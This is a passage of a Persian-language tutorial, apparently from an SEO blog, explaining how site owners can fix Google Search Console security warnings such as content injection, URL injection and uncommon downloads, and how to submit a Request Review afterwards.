مرحله چهارم: پس از اطمینان از رفع این مشکل امنیتی می‌توانید در گزارش سرچ کنسول با انتخاب گزینه Request Review از گوگل مجدد درخواست کنید که صفحات شما را بررسی کند.

8- مشکل امنیتی Hacked: Content injection

اگر در گزارش Security Issues سرچ کنسول خطای امنیتی Content injection را دریافت می‌کنید بدانید که در بخشی از سایتتان یکسری لینک یا متون اسپم که هیچ ارتباطی با محتوای فعلی وب‌سایت شما ندارند اضافه شده‌است. شاید بپرسید هکرها از چگونه دست به چنین کاری زده‌اند، احتمالات پیش روی شما:

• دسترسی یکی از دایرکتوری‌های سرور سایت باز است و همین دایرکتوری ناامن به هکر فرصت نفوذ داده‌است.
• نرم افزاری که روی سایت نصب کرده‌اید نقاطی آسیپ پذیر داشته، این نرم افزار می‌تواند یک CMS مثل جوملا یا وردپرس باشد. پس همیشه از آخرین نسخه نرم افزارها استفاده کنید.
• هک یکی از افزونه های شخص ثالث سایت یکی از روش‌های رایج نفوذ به سایت است (مثل افزونه شمارش تعداد بازدیدکنندگان)

نحوه رفع خطا Hacked: Content injection سرچ کنسول

مرحله اول: صفحات آلوده به محتوای مخرب را از روش‌های امن بررسی کنید. بدین منظور می‌توانید به برخی از آدرس‌هایی که در Sample URLs پیشنهاد شده‌اند مراجعه نمایید.

مرحله دوم: به فچ کردن تک تک صفحات سایت ادامه دهید و به دنبال لینک یا متونی بگردید که اطمینان دارید که خودتان اضافه نکرده‌اید.

مرحله سوم: در مرحله بعدی نوبت پاکسازی سایت است که گوگل عزیز در این لینک به طور جامع در مورد نحوه پاکسازی سایت توضیح داده‌است. در این مرحله می‌توانید فایلهای آسیب دیده را با آخرین نسخه بکاپ جایگزین کنید یا محتوای اسپم را خودتان حذف کنید.

مرحله چهارم: پس از اطمینان از رفع باگ‌های امنیتی و حذف لینک و متون اسپم باید در گزارش سرچ کنسول با انتخاب گزینه Request Review از گوگل مجدد درخواست کنید که صفحات شما را بررسی کند.

9- مشکل امنیتی Hacked: URL injection

نفوذ به سایت و افزودن محتوای مخرب همیشه به ریدایرکت یا لینک‌های الوده خلاصه نمی‌شود، حتی در مواردی دیده شده که هکرها در سایت قربانی یکسری صفحات جدید می‌سازند و از این طریق هر محتوا و لینک آلوده‌ای را وارد سایت می‌کنند. این مشکل امنیتی وقتی خطرناک می‌شود که وب‌سرور سایت قربانی برای حملات به سایت‌های دیگر مورد سوء استفاده قرار می‌گیرد.

آموزش رفع خطا Hacked: URL injection سرچ کنسول:

مرحله اول: از یکی از روش‌های امن آدرس‌هایی که در قسمت sample URLs این خطا ارائه شده‌است مورد بررسی قرار دهید. احتمالا این صفحات توسط شما ساخته نشده‌است پس آن ها را حذف کنید یا کدی که باعث شده این صفحات به صورت خودکار تولید شوند را شناسایی و حذف کنید. این ویدئو و مقاله جامع از سایت گوگل بسیار به شما کمک می‌کند.

مرحله دوم: برای یافتن صفحاتی که خودتان نساخته‌اید سه راه حل دارید:

1. 1. اگر سایت کوچکی دارید کافیست با درج دستور site:domain.com تمامی آدرس‌های سایتتان که در گوگل ایندکس شده‌است را ببینید.
   2. اگر سایت بزرگی دارید و بررسی تک تک صفحات ایندکس شده زمانبر می‌شود می‌توانید با دستور site:domain.com word صفحاتی که دارای یکی از کلمات اسپم رایج است را پیدا کنید.
   3. چنانچه سایت بزرگی دارید و از سیستم مدیریت محتوای وردپرس استفاده می‌کنید می‌توانید با استفاده از دستور site:domain.com/wp-admin/ تمامی صفحات ایندکس شده سایت را در بخش مدیریت سایت وردپرسی مشاهده نمایید.

1. مرحله سوم: پس از رفع مشکلات فوق نسبت به پاکسازی سایت اقدام نمایید. در این مرحله می‌توانید دایرکتوری‌های آلوده سایت را با یکی از فایل های بکاپ سالم جایگزین کنید و یا اینکه تمام صفحات، فایل و توابعی که هکر از آن استفاده کرده را پاک کنید.

مرحله چهارم: پس از اطمینان از رفع باگ‌های امنیتی و حذف صفحات مخرب باید در گزارش سرچ کنسول با انتخاب گزینه Request Review از گوگل درخواست تجدید نظر کنید.

10- هشدار امنیتی Uncommon downloads

در صورت مشاهده این اخطار امنیتی شوکه نشوید. در بسیاری از موارد اگر سرویس Google Safe Browsing فایل‌های دانلودی سایت را غیرمعمول شناسایی کند چنین اخطاری در بخش امنیت سرچ کنسول ثبت می‌شود. همچنین اگر به تازگی یکسری فایل برای دانلود در سایت قرار داده باشید یا تعداد دانلود یک فایل خیلی پایین باشد این هشدار امنیتی رایج است.

نحوه رفع هشدار امنیتی Uncommon downloads سرچ کنسول:

مرحله اول: با اسکن سایت خودتان در suucuri _(لینک) و نصب یکی از قوی‌ترین افزونه های امنیت سایت (اگر سایت وردپرسی دارید) از بابت نبود مشکلات امنیتی و نقاط آسیپ پذیر اطمینان حاصل کنید.

مرحله دوم: اگر فکر می‌کنید که فایل دانلود سایت با دستورالعمل‌های گوگل _(لینک) در تضاد نیست کافیست درخواست تجدیدنظر را از طریق گزینه Request Review سرچ کنسول ثبت کنید تا فایل های دانلودی سایت مجدد بررسی شوند. درهرصورت اگر مشکلی نباشد پس از چند روز این هشدار امنیتی نیز حذف می‌شود.

مرحله نهایی: درخواست تجدید نظر یا Request Review

بعد رفع تمام مشکلات لیست شده در گزارش Security Issues سرچ کنسول اول به خودتان تبریک بگویید ? و سپس روی گزینه Request Review کلیک کنید.

Request Review مثل یک بررسی مجدد و تجدیدنظر می‌ماند و Google Safe Browsing را ملزم می‌سازد که مجدد سایت شما را اسکن کند.

هنگام ثبت درخواست تجدید نظر به نکات زیر توجه داشته باشید:

• نوع مشکل امنیتی را به طور دقیق شرح دهید.
• مراحلی که برای رفع مشکل امنیتی طی کرده‌اید ذکر کنید.
• مستندات نتیجه مراحلی که انجام داده‌اید را ارائه دهید.

پس از ارسال درخواست تجدیدنظر یک ایمیل تأییدیه برای شما ارسال می‌‌شود، این نکته را مدنظر داشته باشید که پس از تأیید درخواست روند بازبینی رفع مشکلات امنیتی بین 1 الی 2 هفته طول می کشد.

نکته: هیچوقت قبل از فیکس خطا و هشارهای امنیتی درخواست Request Review را ثبت نکنید، چرا که بعد از رفع مشکلات امنیتی تا مدتی طولانی مثل 30 روز ممکن است که نتوانید Request Review را ثبت کنید.

جمع بندی

به پایان مقاله آموزش رفع مشکل امنیتی در سرچ کنسول گوگل رسیدیم. در این مطلب راجع به انواع مشکل امنیتی که ممکن است وب‌سایت‌های مختلف گرفتار آن شوند صحبت کردیم. آموختیم که امنیت کاربران برای موتور جستجوی گوگل یک اولویت است؛ در نتیجه فرقی نمی‌کند که به عمد یا غیرعمد در سایت شما یکسری ساز و کارهای غیرامن و خطرناک درحال انجام بوده، در هرصورت هرطور که شده باید به رفع خطاهای امنیتی سایت بپردازید!

خطرناک‌ترین و پیچیده ترین مشکلات امنیتی وب‌سایت آن دسته از مشکلات امنیتی می‌باشند که از طریق هک و نفوذ به سایت اتفاق افتاده‌است. بنابراین در چنین مواردی علاوه بر حذف اقدامات هکر (مثل تعبیه بدافزار) باید به فکر یافتن باگ امنیتی سایت باشید تا مجدد آسیب نبینید.

چنانچه به صورت عملی تمایل به استفاده از آموزش سرچ کنسول دارید قطعا دوره دانلودی Search Console بهترین انتخاب شما خواهد بود. در نهایت اگر سوال و ابهامی در رابطه با گزارش Security Issues سرچ کنسول دارید حتما از ما بپرسید?

نویسنده مقاله: پرستو علیرضازاده / کارشناس تولید محتوا
ویرایش و سئو مقاله: پوریا آریافر / متخصص و مشاور سئو